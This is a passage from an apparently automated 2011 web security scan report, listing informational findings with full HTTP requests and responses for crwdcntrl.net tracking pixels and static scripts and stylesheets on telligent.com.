Severity:   Information
Confidence:   Certain
Host:   http://tags.crwdcntrl.net
Path:   /5/c=244/b=2253465

Request

GET /5/c=244/b=2253465 HTTP/1.1
Host: tags.crwdcntrl.net
Proxy-Connection: keep-alive
Referer: http://www.project-syndicate.org/register
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: aud=ABR4nGNgYGDwjes%2FyMDAqGeZ2HWSQY6BQUCJAQx6wSTPZTAl%2BBVM8TKDKaE2iNxNiKA0hMcHprgegyn%2Bv2BKmANMsfGCKQ4jiKBZA0MDAwOfKJgncBwiWA0WFHoG0e4GsTYCYl8xhCoBU6IQw3jegzXw%2FoMIQhwtANHAawpxiz%2BQAACz%2FhXc; cc=ACB4nGNQMEuzsLRIs0w1Nk80TUtLSkuySLMwMTdNNUq0NATKmDMAgW9c%2F8H%2F%2F2%2BtYGBg1LNM7DoJEmNgdZZVYmJgkGRg%2BM%2FIwPDlfxqQAjI4hLZaMsKEgQxmpaSZyPLMSvFeYH4qhM8otGkHSP3%2F31A%2BA4dMnTq6wVytkzCE6hvQhTgfL0cX4k7YhSm0E12Ir%2BItupCs2UV0IQBB%2BlIK

Response

HTTP/1.1 200 OK
Date: Sun, 27 Feb 2011 02:19:55 GMT
Server: Apache/2.2.8 (CentOS)
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Cache-Control: no-cache
Expires: 0
Pragma: no-cache
P3P: CP=NOI DSP COR NID PSAa PSDa OUR UNI COM NAV
Set-Cookie: aud=ABR4nGNgYGDwzdxymoGBUS%2FlldUJBhkGBgEl%2FV5OoHgvmOK5DKYEv4IpXmYwJdQGkbsJEZSG8PjAFNdjMMX%2FF0wJc4ApNl4wxWEEETRjAAE%2BUTBP4DhEsBosKPQMot0NYm0ExL5iCFUCseg9WCXvP4jtphBTICq5%2FIEUAOUFJn0%3D; Domain=.crwdcntrl.net; Expires=Thu, 24-Nov-2011 02:19:55 GMT; Path=/
Set-Cookie: cc=ACB4nGNQMEuzsLRIs0w1Nk80TUtLSkuySLMwMTdNNUq0NATKmDMAgW%2FmltP%2Fv2ydx8DAqJfyyuoESIyB1VlWiYmBQfJC8X9GBoYvDAxACshnbGDgUEqaiSbELLTVkhGmGMRXiveCKgHLMwpt2gGWz4PIMzJwyNSpoxvP1ToJQ6i%2BAV2I8%2FFydCHuhF2YQjvRhfgq3qILyZpdRBcCAHhyUXw%3D; Domain=.crwdcntrl.net; Expires=Thu, 24-Nov-2011 02:19:55 GMT; Path=/
Set-Cookie: OAID=6f898f9e37a5ffbfb8f8475e2a918987; Domain=.crwdcntrl.net; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: image/gif
Content-Length: 49

GIF89a...................!.......,...........T..;

7.395. http://tags.crwdcntrl.net/5/c=25/b=1225394  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tags.crwdcntrl.net
Path:   /5/c=25/b=1225394

Request

GET /5/c=25/b=1225394 HTTP/1.1
Host: tags.crwdcntrl.net
Proxy-Connection: keep-alive
Referer: http://www.project-syndicate.org/series_metacategory/1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: aud=ABR4nGNgYGDwzdxymoGBUS%2FlldVZBlkGBgEl%2FV5OoHgvmOK5DKYEv4IpXmYwJdQGkbsJEZSG8PjAFNdjMMX%2FF0wJc4ApNl4wxWEEETRjAAE%2BUTBP4DhEsBosKPQMot0NYm0ExL5iCFUCseg9WKWwPpji%2FQdxhCnEMIgGLn8gBQDbtibF; cc=ACB4nGNQMEuzsLRIs0w1Nk80TUtLSkuySLMwMTdNNUq0NATKmDMAgW%2FmltP%2Fv2ydx8DAqJfyyuosSIyBzVlWiYmBQfJC8X9GBoYvDAxACshnbGDgUIp3gQsBGYxKSTOhfLA8s9BWS0aYThBfKd4LWZ5RaNMOsHweRJ6RgUOmTh3dLq7WSRhC9Q3oQpyPl6MLcSfswhTaiS7EV%2FEWXUjW7CK6EAAHWlQ7; OAID=6f898f9e37a5ffbfb8f8475e2a918987

Response

HTTP/1.1 200 OK
Date: Sun, 27 Feb 2011 02:20:00 GMT
Server: Apache/2.2.8 (CentOS)
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Cache-Control: no-cache
Expires: 0
Pragma: no-cache
P3P: CP=NOI DSP COR NID PSAa PSDa OUR UNI COM NAV
Set-Cookie: aud=ABR4nGNgYGDwzdxygYGBUS%2Fllc8CBlkGBgElBjDoBZM8l8GU4FcwxcsMpoTaIHI3IYLSEB4fmOJ6DKZEFcAU%2F18wJcwBpth4wRSHEZjiE4WoFAZTAschRj%2BD6HODWBsBESyGUCUQi943MDQAzdQHU7z%2FII4whZgSARbk8geyAeZVFfg%3D; Domain=.crwdcntrl.net; Expires=Thu, 24-Nov-2011 02:20:00 GMT; Path=/
Set-Cookie: cc=ACB4nGNQMEuzsLRIs0w1Nk80TUtLSkuySLMwMTdNNUq0NATKmDMAgW%2Fmlgv%2Fv2ydycDAqJfyymcBSIyBxVlWiYmBQZKB4T8jA8OX%2F%2F%2BBFJDBLLRpEyNMGMhgFNq0A8SHyTMqxbsgq2dk4JCpU0c3iKt1EroQX8VbDFX1DehC3Am70IU4Hy9HF5I1u4ipcSe6EAAzBFRD; Domain=.crwdcntrl.net; Expires=Thu, 24-Nov-2011 02:20:00 GMT; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: image/gif
Content-Length: 49

GIF89a...................!.......,...........T..;

7.396. http://tags.crwdcntrl.net/5/c=25/b=1225400  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tags.crwdcntrl.net
Path:   /5/c=25/b=1225400

Request

GET /5/c=25/b=1225400 HTTP/1.1
Host: tags.crwdcntrl.net
Proxy-Connection: keep-alive
Referer: http://www.project-syndicate.org/series_metacategory/1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: aud=ABR4nGNgYGDwzdxymoGBUS%2FlldVZBlkGBgEl%2FV5OoHgvmOK5DKYEv4IpXmYwJdQGkbsJEZSG8PjAFNdjMMX%2FF0wJc4ApNl4wxWEEETRjAAE%2BUTBP4DhEsBosKPQMot0NYm0ExL5iCFUCseg9WKWwPpji%2FQdxhCnEMIgGLn8gBQDbtibF; cc=ACB4nGNQMEuzsLRIs0w1Nk80TUtLSkuySLMwMTdNNUq0NATKmDMAgW%2FmltP%2Fv2ydx8DAqJfyyuosSIyBzVlWiYmBQfJC8X9GBoYvDAxACshnbGDgUIp3gQsBGYxKSTOhfLA8s9BWS0aYThBfKd4LWZ5RaNMOsHweRJ6RgUOmTh3dLq7WSRhC9Q3oQpyPl6MLcSfswhTaiS7EV%2FEWXUjW7CK6EAAHWlQ7; OAID=6f898f9e37a5ffbfb8f8475e2a918987

Response

HTTP/1.1 200 OK
Date: Sun, 27 Feb 2011 02:19:59 GMT
Server: Apache/2.2.8 (CentOS)
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Cache-Control: no-cache
Expires: 0
Pragma: no-cache
P3P: CP=NOI DSP COR NID PSAa PSDa OUR UNI COM NAV
Set-Cookie: aud=ABR4nGNgYGDwzdxynoGBUS%2FllU8RgywDg4ASAxj0gkmey2BK8CuY4mUGU0JtELmbEEFpCI8PTHE9BlOiCmCK%2Fy%2BYEuYAU2y8YIrDCEzxiUJUCoMpgeMQo59B9LlBrI2ACBZDqBKIRe8bGBqA1v6DGK0P5glEQARNIY7wBxIAxwQVyQ%3D%3D; Domain=.crwdcntrl.net; Expires=Thu, 24-Nov-2011 02:19:59 GMT; Path=/
Set-Cookie: cc=ACB4nGNQMEuzsLRIs0w1Nk80TUtLSkuySLMwMTdNNUq0NATKmDMAgW%2FmlvP%2Fv2ydxcDAqJfyyqcIJMbA7CyrxMTAIMnA8J%2BRgeELmAIymIQ27WCECQMZjErxLsjyjAwcMnXq6Bq5WidhCNU3oAtxPl6OLsSdsAtTaCe6EF%2FFW3QhWbOL6EIABfo7lw%3D%3D; Domain=.crwdcntrl.net; Expires=Thu, 24-Nov-2011 02:19:59 GMT; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: image/gif
Content-Length: 49

GIF89a...................!.......,...........T..;

7.397. http://tags.crwdcntrl.net/5/c=25/b=1226041  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tags.crwdcntrl.net
Path:   /5/c=25/b=1226041

Request

GET /5/c=25/b=1226041 HTTP/1.1
Host: tags.crwdcntrl.net
Proxy-Connection: keep-alive
Referer: http://www.project-syndicate.org/series_metacategory/1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: aud=ABR4nGNgYGDwzdxymoGBUS%2FlldVZBlkGBgEl%2FV5OoHgvmOK5DKYEv4IpXmYwJdQGkbsJEZSG8PjAFNdjMMX%2FF0wJc4ApNl4wxWEEETRjAAE%2BUTBP4DhEsBosKPQMot0NYm0ExL5iCFUCseg9WKWwPpji%2FQdxhCnEMIgGLn8gBQDbtibF; cc=ACB4nGNQMEuzsLRIs0w1Nk80TUtLSkuySLMwMTdNNUq0NATKmDMAgW%2FmltP%2Fv2ydx8DAqJfyyuosSIyBzVlWiYmBQfJC8X9GBoYvDAxACshnbGDgUIp3gQsBGYxKSTOhfLA8s9BWS0aYThBfKd4LWZ5RaNMOsHweRJ6RgUOmTh3dLq7WSRhC9Q3oQpyPl6MLcSfswhTaiS7EV%2FEWXUjW7CK6EAAHWlQ7; OAID=6f898f9e37a5ffbfb8f8475e2a918987

Response

HTTP/1.1 200 OK
Date: Sun, 27 Feb 2011 02:20:00 GMT
Server: Apache/2.2.8 (CentOS)
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Cache-Control: no-cache
Expires: 0
Pragma: no-cache
P3P: CP=NOI DSP COR NID PSAa PSDa OUR UNI COM NAV
Set-Cookie: aud=ABR4nGNgYGDwzdxygYGBUS%2Fllc91BlkGBgElBjDoBZM8l8GU4FcwxcsMpoTaIHI3IYLSEB4fmOJ6DKZEFcAU%2F18wJcwBpth4wRSHEZjiE4WoFAZTAschRj%2BD6HODWBsBESyGUCUQi943MDQArf0HMVofzBOIgAiaQhzhDyQAGS8WLw%3D%3D; Domain=.crwdcntrl.net; Expires=Thu, 24-Nov-2011 02:20:00 GMT; Path=/
Set-Cookie: cc=ACB4nGNQMEuzsLRIs0w1Nk80TUtLSkuySLMwMTdNNUq0NATKmDMAgW%2Fmlgv%2Fv2ydycDAqJfyyuc6SIyB1VlWiYmBQZKB4T8jA8OX%2F%2F%2BBFJDBIrTVkhEmDGQwCm3ahMbfAeLD1DMqxbsg62dk4JCpU0c3mKt1EoZQfQO6EHfCLnQhzsfLMVXtRBfiq3iLLiRrdhFdCACDTVaY; Domain=.crwdcntrl.net; Expires=Thu, 24-Nov-2011 02:20:00 GMT; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: image/gif
Content-Length: 49

GIF89a...................!.......,...........T..;

7.398. http://telligent.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://telligent.com
Path:   /

Request

GET / HTTP/1.1
Host: telligent.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CSExtendedAnalytics=13b36763-58d5-4e2d-a664-810fee6b36c6; __utmz=53647277.1298757602.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AuthorizationCookie=649be3c6-1f4e-43ca-9aca-2fc7a463d13d; __utma=53647277.670287554.1298757602.1298757602.1298757602.1; CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+22%3a04%3a55+GMT; CommunityServer-LastVisitUpdated-1850=; __utmc=53647277; __utmb=53647277.1.10.1298757602; CSExtendedAnalyticsSession=560a102e-bd90-4a32-912f-ea337f9ef1cb;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
Telligent-Evolution: 5.5.134.11785
Set-Cookie: CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+23%3a21%3a28+GMT; expires=Sun, 26-Feb-2012 23:21:28 GMT; path=/
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 26 Feb 2011 23:21:27 GMT
Connection: close
Content-Length: 49674


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...

7.399. http://telligent.com/Custom/Images/ajax-spinner-circle.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://telligent.com
Path:   /Custom/Images/ajax-spinner-circle.gif

Request

GET /Custom/Images/ajax-spinner-circle.gif HTTP/1.1
Host: telligent.com
Proxy-Connection: keep-alive
Referer: http://telligent.com/products/request_a_demo.aspx
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AuthorizationCookie=649be3c6-1f4e-43ca-9aca-2fc7a463d13d; CSExtendedAnalytics=13b36763-58d5-4e2d-a664-810fee6b36c6; CSExtendedAnalyticsSession=560a102e-bd90-4a32-912f-ea337f9ef1cb; __utmz=53647277.1298757602.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=53647277.670287554.1298757602.1298757602.1298757602.1; CommunityServer-UserCookie1850=lv=Sat%2c+26+Feb+2011+23%3a23%3a49+GMT&mra=Sat%2c+26+Feb+2011+23%3a23%3a56+GMT; CommunityServer-LastVisitUpdated-1850=

Response

HTTP/1.1 200 OK
Content-Type: image/gif
Last-Modified: Sun, 13 Apr 2008 22:31:00 GMT
Accept-Ranges: bytes
ETag: "06a89cb69dc81:0"
Server: Microsoft-IIS/7.0
Telligent-Evolution: 5.5.134.11785
Set-Cookie: CommunityServer-UserCookie1850=lv=Sat%2c+26+Feb+2011+23%3a23%3a49+GMT&mra=Sat%2c+26+Feb+2011+23%3a23%3a58+GMT; expires=Sun, 26-Feb-2012 23:23:58 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 26 Feb 2011 23:23:57 GMT
Content-Length: 673

GIF89a................BBB...bbb......!..Created with ajaxload.info.!...
...!..NETSCAPE2.0.....,..........3....0.Ik.c.:....N.f    E.1.......`..q.-[.9...9...Jk.H..!...
...,..........4....N.! .......DqBQT`1
...[SNIP]...

7.400. http://telligent.com/Custom/Scripts/FormUtils.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://telligent.com
Path:   /Custom/Scripts/FormUtils.js

Request

GET /Custom/Scripts/FormUtils.js HTTP/1.1
Host: telligent.com
Proxy-Connection: keep-alive
Referer: http://telligent.com/products/request_a_demo.aspx
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AuthorizationCookie=649be3c6-1f4e-43ca-9aca-2fc7a463d13d; CSExtendedAnalytics=13b36763-58d5-4e2d-a664-810fee6b36c6; CSExtendedAnalyticsSession=560a102e-bd90-4a32-912f-ea337f9ef1cb; __utmz=53647277.1298757602.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=53647277.670287554.1298757602.1298757602.1298757602.1; CommunityServer-UserCookie1850=lv=Sat%2c+26+Feb+2011+23%3a23%3a49+GMT&mra=Sat%2c+26+Feb+2011+23%3a23%3a56+GMT; CommunityServer-LastVisitUpdated-1850=

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Tue, 01 Feb 2011 22:16:48 GMT
Accept-Ranges: bytes
ETag: "088b4b75dc2cb1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
Telligent-Evolution: 5.5.134.11785
Set-Cookie: CommunityServer-UserCookie1850=lv=Sat%2c+26+Feb+2011+23%3a23%3a49+GMT&mra=Sat%2c+26+Feb+2011+23%3a23%3a58+GMT; expires=Sun, 26-Feb-2012 23:23:58 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 26 Feb 2011 23:23:57 GMT
Content-Length: 45562

...// JScript File
/*
Parts of this script were taken from other sources, and the credit is given as required below.
*/

/*
   Country State Drop Downs v1.1.

   (c) Copyright 2006 by Down Home
...[SNIP]...

7.401. http://telligent.com/Custom/Scripts/SearchPhraseManager.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://telligent.com
Path:   /Custom/Scripts/SearchPhraseManager.js

Request

GET /Custom/Scripts/SearchPhraseManager.js HTTP/1.1
Host: telligent.com
Proxy-Connection: keep-alive
Referer: http://telligent.com/products/telligent_community/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+22%3a04%3a36+GMT; CommunityServer-LastVisitUpdated-1850=; AuthorizationCookie=649be3c6-1f4e-43ca-9aca-2fc7a463d13d; CSExtendedAnalytics=13b36763-58d5-4e2d-a664-810fee6b36c6; CSExtendedAnalyticsSession=560a102e-bd90-4a32-912f-ea337f9ef1cb

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Wed, 19 May 2010 00:40:06 GMT
Accept-Ranges: bytes
ETag: "219bfd3ebf6ca1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
Telligent-Evolution: 5.5.134.11785
Set-Cookie: CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+22%3a04%3a39+GMT; expires=Sun, 26-Feb-2012 22:04:39 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 26 Feb 2011 22:04:39 GMT
Content-Length: 3120

var SearchPhraseManager = {
   defaultHiddenFieldNameValue : "",
   getQueryStringParamValue : function(strQStrParam){
       var strURL = document.location.href;
       var strQStrParamValue = "";
       if (str
...[SNIP]...

7.402. http://telligent.com/CustomFooterFragments/scripts/jquery.jfeed.pack.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://telligent.com
Path:   /CustomFooterFragments/scripts/jquery.jfeed.pack.js

Request

GET /CustomFooterFragments/scripts/jquery.jfeed.pack.js HTTP/1.1
Host: telligent.com
Proxy-Connection: keep-alive
Referer: http://telligent.com/products/telligent_community/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CommunityServer-LastVisitUpdated-1850=; AuthorizationCookie=649be3c6-1f4e-43ca-9aca-2fc7a463d13d; CSExtendedAnalytics=13b36763-58d5-4e2d-a664-810fee6b36c6; CSExtendedAnalyticsSession=560a102e-bd90-4a32-912f-ea337f9ef1cb; CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+22%3a04%3a44+GMT

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Sun, 15 Jul 2007 20:37:38 GMT
Accept-Ranges: bytes
ETag: "0d574fb1fc7c71:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
Telligent-Evolution: 5.5.134.11785
Set-Cookie: CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+22%3a04%3a47+GMT; expires=Sun, 26-Feb-2012 22:04:47 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 26 Feb 2011 22:04:46 GMT
Content-Length: 1724

eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);ret
...[SNIP]...

7.403. http://telligent.com/SyntaxHighlighter/scripts/shAutoloader.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://telligent.com
Path:   /SyntaxHighlighter/scripts/shAutoloader.js

Request

GET /SyntaxHighlighter/scripts/shAutoloader.js HTTP/1.1
Host: telligent.com
Proxy-Connection: keep-alive
Referer: http://telligent.com/products/telligent_community/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CommunityServer-LastVisitUpdated-1850=; AuthorizationCookie=649be3c6-1f4e-43ca-9aca-2fc7a463d13d; CSExtendedAnalytics=13b36763-58d5-4e2d-a664-810fee6b36c6; CSExtendedAnalyticsSession=560a102e-bd90-4a32-912f-ea337f9ef1cb; CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+22%3a04%3a44+GMT

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Wed, 08 Sep 2010 15:34:56 GMT
Accept-Ranges: bytes
ETag: "0d085636b4fcb1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
Telligent-Evolution: 5.5.134.11785
Set-Cookie: CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+22%3a04%3a49+GMT; expires=Sun, 26-Feb-2012 22:04:49 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 26 Feb 2011 22:04:49 GMT
Content-Length: 1451

/**
* SyntaxHighlighter
* http://alexgorbatchev.com/SyntaxHighlighter
*
* SyntaxHighlighter is donationware. If you are using it, please donate.
* http://alexgorbatchev.com/SyntaxHighlighter/dona
...[SNIP]...

7.404. http://telligent.com/SyntaxHighlighter/scripts/shCore.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://telligent.com
Path:   /SyntaxHighlighter/scripts/shCore.js

Request

GET /SyntaxHighlighter/scripts/shCore.js HTTP/1.1
Host: telligent.com
Proxy-Connection: keep-alive
Referer: http://telligent.com/products/telligent_community/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CommunityServer-LastVisitUpdated-1850=; AuthorizationCookie=649be3c6-1f4e-43ca-9aca-2fc7a463d13d; CSExtendedAnalytics=13b36763-58d5-4e2d-a664-810fee6b36c6; CSExtendedAnalyticsSession=560a102e-bd90-4a32-912f-ea337f9ef1cb; CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+22%3a04%3a44+GMT

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Wed, 08 Sep 2010 15:34:58 GMT
Accept-Ranges: bytes
ETag: "0fdb6646b4fcb1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
Telligent-Evolution: 5.5.134.11785
Set-Cookie: CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+22%3a04%3a48+GMT; expires=Sun, 26-Feb-2012 22:04:48 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 26 Feb 2011 22:04:48 GMT
Content-Length: 16175

/**
* SyntaxHighlighter
* http://alexgorbatchev.com/SyntaxHighlighter
*
* SyntaxHighlighter is donationware. If you are using it, please donate.
* http://alexgorbatchev.com/SyntaxHighlighter/dona
...[SNIP]...

7.405. http://telligent.com/SyntaxHighlighter/styles/shCore.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://telligent.com
Path:   /SyntaxHighlighter/styles/shCore.css

Request

GET /SyntaxHighlighter/styles/shCore.css HTTP/1.1
Host: telligent.com
Proxy-Connection: keep-alive
Referer: http://telligent.com/products/telligent_community/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+22%3a04%3a36+GMT; CommunityServer-LastVisitUpdated-1850=; AuthorizationCookie=649be3c6-1f4e-43ca-9aca-2fc7a463d13d; CSExtendedAnalytics=13b36763-58d5-4e2d-a664-810fee6b36c6; CSExtendedAnalyticsSession=560a102e-bd90-4a32-912f-ea337f9ef1cb

Response

HTTP/1.1 200 OK
Content-Type: text/css
Last-Modified: Wed, 08 Sep 2010 15:34:58 GMT
Accept-Ranges: bytes
ETag: "0fdb6646b4fcb1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
Telligent-Evolution: 5.5.134.11785
Set-Cookie: CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+22%3a04%3a39+GMT; expires=Sun, 26-Feb-2012 22:04:39 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 26 Feb 2011 22:04:39 GMT
Content-Length: 6204

/**
* SyntaxHighlighter
* http://alexgorbatchev.com/SyntaxHighlighter
*
* SyntaxHighlighter is donationware. If you are using it, please donate.
* http://alexgorbatchev.com/SyntaxHighlighter/dona
...[SNIP]...

7.406. http://telligent.com/SyntaxHighlighter/styles/shThemeDefault.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://telligent.com
Path:   /SyntaxHighlighter/styles/shThemeDefault.css

Request

GET /SyntaxHighlighter/styles/shThemeDefault.css HTTP/1.1
Host: telligent.com
Proxy-Connection: keep-alive
Referer: http://telligent.com/products/telligent_community/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+22%3a04%3a36+GMT; CommunityServer-LastVisitUpdated-1850=; AuthorizationCookie=649be3c6-1f4e-43ca-9aca-2fc7a463d13d; CSExtendedAnalytics=13b36763-58d5-4e2d-a664-810fee6b36c6; CSExtendedAnalyticsSession=560a102e-bd90-4a32-912f-ea337f9ef1cb

Response

HTTP/1.1 200 OK
Content-Type: text/css
Last-Modified: Wed, 08 Sep 2010 15:34:58 GMT
Accept-Ranges: bytes
ETag: "0fdb6646b4fcb1:0"
